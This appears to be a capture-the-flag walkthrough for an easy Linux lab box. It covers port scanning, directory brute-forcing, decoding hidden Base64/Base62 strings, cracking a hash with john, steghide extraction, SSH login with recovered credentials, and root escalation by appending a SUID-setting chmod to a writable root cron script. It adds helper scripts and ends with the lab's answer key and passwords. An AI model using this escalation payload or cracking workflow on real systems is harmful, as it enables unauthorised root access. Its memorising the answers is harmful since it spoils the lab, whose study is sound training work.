Machine Info
Difficulty: Easy🟩
Link: HERE
Avg time: 45 Minutes
OS: Linux
Description: Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Task 1
Enumeration starts with nmap.
sudo nmap -Pn -sV -sC -n -T4 -p- -oN scan.txt 10.113.130.85
Three ports are open:
- 80/tcp - HTTP
- 6498/tcp - SSH
- 65524/tcp - HTTP
Question 1
How many ports are open? Answer: 3
Question 2
What is the version of nginx? Answer: 1.16.1
Question 3
What is running on the highest port? Answer: Apache
Task 2
Port 80 serves the nginx default page.
INFO:
Feroxbuster was used instead of gobuster, but both commands are provided.
Running:
feroxbuster -u 'http://[IP]' --wordlist /usr/share/dirb/wordlists/common.txt
# or
gobuster dir -u 'http://[IP]' -w /usr/share/dirb/wordlists/common.txt
The scan reveals robots.txt, but it contains nothing useful. There is also hidden/, which displays a creepy image; its source reveals nothing. Ferox also finds hidden/whatever/, which shows a mountain landscape. The source of that page contains a paragraph carrying the HTML hidden attribute, so the browser never renders it.
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
background-repeat: no-repeat;
background-size: cover;
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>
The trailing == marks it as Base64; decoding it with CyberChef gives flag{REDACTED}.
Port 65524 shows the Apache default page. Source code contains another hidden paragraph.
<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
The hint points to one of the BaseNN encodings. Trying each Base variant in CyberChef shows that only Base62 produces readable output: /n0th1ng3ls3m4tt3r, the name of a hidden directory. The same Apache default page has another flag embedded in its HTML.
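As an added example (not code from the original writeup), the following Python script reproduces the two hidden-paragraph finds offline: it pulls every `<p hidden>` out of a saved page source, then tries Base64 and, if that does not yield printable ASCII, Base62. The Base62 decoder assumes CyberChef's default behaviour, treating the string as one big integer over the 0-9A-Za-z alphabet; the two HTML fragments are copied from the page sources shown above, and the function names are my own.

```python
import base64
import string
from html.parser import HTMLParser

# CyberChef's default Base62 alphabet (assumption: the writeup used the default).
B62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

# Page sources copied from the writeup: hidden/whatever/ on port 80 and the Apache page on 65524.
HIDDEN_WHATEVER = "<html><body><center><p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p></center></body></html>"
APACHE_DEFAULT = "<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>"


def b62decode(text):
    """Decode a Base62 string as one big integer into bytes (CyberChef style)."""
    n = 0
    for ch in text:
        n = n * 62 + B62_ALPHABET.index(ch)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def b62encode(data):
    """Inverse of b62decode; leading zero bytes are not preserved."""
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, rem = divmod(n, 62)
        digits = B62_ALPHABET[rem] + digits
    return digits or "0"


class HiddenParagraphs(HTMLParser):
    """Collect the text of every <p> that carries the HTML `hidden` attribute."""

    def __init__(self):
        super().__init__()
        self._in_hidden = False
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "p" and any(name == "hidden" for name, _ in attrs):
            self._in_hidden = True
            self.found.append("")

    def handle_endtag(self, tag):
        if tag == "p":
            self._in_hidden = False

    def handle_data(self, data):
        if self._in_hidden:
            self.found[-1] += data


def hidden_paragraphs(html):
    """Return the stripped text of all hidden paragraphs in the page source."""
    parser = HiddenParagraphs()
    parser.feed(html)
    return [text.strip() for text in parser.found]


def try_decode(paragraph):
    """Return (scheme, text) for the first decoding that yields printable ASCII, else None."""
    payload = paragraph.rsplit(":", 1)[-1].strip()   # drop a "hint:" prefix if present
    candidates = []
    try:
        candidates.append(("base64", base64.b64decode(payload, validate=True)))
    except ValueError:                                # binascii.Error is a ValueError
        pass
    if payload and all(ch in B62_ALPHABET for ch in payload):
        candidates.append(("base62", b62decode(payload)))
    for scheme, raw in candidates:
        if raw.isascii() and raw.decode("ascii").isprintable():
            return scheme, raw.decode("ascii")
    return None


def decode_hidden(html):
    """Decode every hidden paragraph in a page; entries are None when nothing fits."""
    return [try_decode(p) for p in hidden_paragraphs(html)]


if __name__ == "__main__":
    for page in (HIDDEN_WHATEVER, APACHE_DEFAULT):
        print(decode_hidden(page))
```

Base64 is tried first because it is the common case; the Apache string happens to be a syntactically valid Base64 payload too, but it decodes to non-ASCII bytes, which is why the Base62 path is needed.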
<li>
They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{REDACTED}
*-available/ counterparts. These should be managed
by using our helpers
<tt>
a2enmod,
a2dismod,
</tt>
<tt>
a2ensite,
a2dissite,
</tt>
and
<tt>
a2enconf,
a2disconf
</tt>. See their respective man pages for detailed information.
</li>
Visiting /n0th1ng3ls3m4tt3r shows a page with a 'matrix' image and a hash.

Running john with the provided wordlist fails at first, most likely because john guesses the wrong hash format. To fix this, john is run once for every format that hashid suggested.
for f in Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256; do john hash.txt --wordlist=~/Desktop/easypeasy.txt --format=$f ; done
John cracks the hash with --format=gost. GOST (GOST R 34.11-94) is a Russian hash standard with a 256-bit digest, comparable to SHA-256.
The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract secrettext.txt from the image.
steghide extract -sf binarycodepixabay.jpg
The file contains username boring in plain text and a password in binary.
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
The binary decodes to iconvertedmypasswordtobinary. Logging in via SSH (port 6498) as boring and reading /home/boring/user.txt reveals the user flag.
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
The flag looks like a Caesar or Vigenère cipher. Cipher Identifier identifies it as Caesar. Trying each shift manually, shift 13 decodes it to flag{REDACTED}.
INFO: ROT13 is simply the Caesar cipher with a shift of 13.
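As an added example (not part of the original writeup), this Python script handles the two encodings met on the box: it turns the 8-bit binary groups from secrettext.txt back into the SSH password, and it brute-forces all 26 Caesar shifts of user.txt instead of trying them by hand, keeping only shifts whose plaintext contains the expected flag{ marker. The two input strings are copied from the page; the function names are my own.

```python
import string

# Values copied from the writeup: the binary password from secrettext.txt and the rotated user.txt.
BINARY_PASSWORD = ("01101001 01100011 01101111 01101110 01110110 01100101 01110010 "
                   "01110100 01100101 01100100 01101101 01111001 01110000 01100001 "
                   "01110011 01110011 01110111 01101111 01110010 01100100 01110100 "
                   "01101111 01100010 01101001 01101110 01100001 01110010 01111001")
ROTATED_FLAG = "synt{a0jvgf33zfa0ez4y}"


def binary_to_text(bits):
    """Turn space-separated 8-bit groups into text; rejects malformed groups."""
    chars = []
    for group in bits.split():
        if len(group) != 8 or set(group) - {"0", "1"}:
            raise ValueError(f"not an 8-bit group: {group!r}")
        chars.append(chr(int(group, 2)))
    return "".join(chars)


def caesar_shift(text, shift):
    """Rotate ASCII letters by `shift`; digits, braces and other symbols pass through."""
    lower, upper = string.ascii_lowercase, string.ascii_uppercase
    out = []
    for ch in text:
        if ch in lower:
            out.append(lower[(lower.index(ch) + shift) % 26])
        elif ch in upper:
            out.append(upper[(upper.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def brute_force_caesar(ciphertext, marker="flag{"):
    """Try all 26 shifts and return (shift, plaintext) for those containing the marker."""
    hits = []
    for shift in range(26):
        plain = caesar_shift(ciphertext, shift)
        if marker in plain:
            hits.append((shift, plain))
    return hits


if __name__ == "__main__":
    print(binary_to_text(BINARY_PASSWORD))
    for shift, plain in brute_force_caesar(ROTATED_FLAG):
        print(f"shift {shift}: {plain}")
```

Because the flag format is known in advance, the marker check turns a 26-candidate guessing exercise into a single unambiguous answer; ROT13 is just the case where the only surviving shift is 13.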
The room description mentions vulnerable cronjobs, so /etc/crontab is checked.
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
Root runs /var/www/.mysecretcronjob.sh every minute. The file is owned by boring and writable, so anything appended to it executes as root; the payload uses that to set the SUID bit on /bin/bash.
The following payload is appended to the script.
echo 'chmod +s /bin/bash' >> /var/www/.mysecretcronjob.sh
After the cronjob fires, running
bash -p
gives a root shell.
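As an added example (not code from the original writeup), the Python script below automates the check that found this cronjob: it parses /etc/crontab-style text, follows any `cd` in the command chain to resolve the script a root job actually runs, and reports the ones the current user can write to. The demo rebuilds the page's situation in a temporary directory with a constructed crontab entry modelled on the line above; the function names and the temp-dir layout are my own.

```python
import os
import re
import shlex
import tempfile

CRON_FIELDS = 5   # minute hour day-of-month month day-of-week


def parse_crontab(text):
    """Yield (user, command) for each job line of a system crontab (/etc/crontab format)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # SHELL=, PATH=, MAILTO= and similar
            continue
        if line.startswith("@"):             # @reboot, @hourly ...: a single schedule field
            parts, expected = line.split(None, 2), 3
        else:
            parts, expected = line.split(None, CRON_FIELDS + 1), CRON_FIELDS + 2
        if len(parts) == expected:
            yield parts[-2], parts[-1]


def referenced_files(command, default_cwd="/"):
    """Resolve the existing files a command chain names, honouring `cd` along the way."""
    cwd = default_cwd
    found = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        try:
            tokens = shlex.split(segment)
        except ValueError:                   # unbalanced quotes: skip the segment
            continue
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = os.path.normpath(os.path.join(cwd, tokens[1])) if len(tokens) > 1 else default_cwd
            continue
        for tok in tokens:
            path = os.path.normpath(os.path.join(cwd, tok))
            if os.path.isfile(path):
                found.append(path)
    return found


def writable_root_jobs(crontab_text, default_cwd="/"):
    """Return (command, path) for scripts that root's cron jobs run and we can write to."""
    hits = []
    for user, command in parse_crontab(crontab_text):
        if user != "root":
            continue
        for path in referenced_files(command, default_cwd):
            if os.access(path, os.W_OK):
                hits.append((command, path))
    return hits


def demo():
    """Rebuild the writeup's situation in a temp dir: a root job running a script we own."""
    with tempfile.TemporaryDirectory() as www:
        script = os.path.join(www, ".mysecretcronjob.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n")
        # Constructed crontab text modelled on the page's entry, pointed at the temp dir.
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            f"* * * * * root cd {shlex.quote(www)} && sudo bash .mysecretcronjob.sh\n"
            "*/5 * * * * boring /usr/bin/true\n"
        )
        return writable_root_jobs(crontab)


if __name__ == "__main__":
    for command, path in demo():
        print(f"writable script {path} run by root via: {command}")
```

On a real target, feed it `open("/etc/crontab").read()` and pass the job owner's home directory as `default_cwd`, since cron starts each job there; the same writability test applies to /etc/cron.d entries, which use the identical six-field-plus-user layout.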
Question 1
Using GoBuster, find flag 1. Answer: flag{REDACTED}
Question 2
Further enumerate the machine, what is flag 2? Answer: flag{REDACTED}
Question 3
Crack the hash with easypeasy.txt, What is the flag 3? Answer: flag{REDACTED}
Question 4
What is the hidden directory? Answer: /n0th1ng3ls3m4tt3r (PEAK Reference to Metallica)
Question 5
Using the wordlist provided to you in this task, crack the hash. What is the password? Answer: mypasswordforthatjob
Question 6
What is the password to login to the machine via SSH? Answer: iconvertedmypasswordtobinary
Question 7
What is the user flag? Answer: flag{REDACTED}
Question 8
What is the root flag? Answer: flag{REDACTED}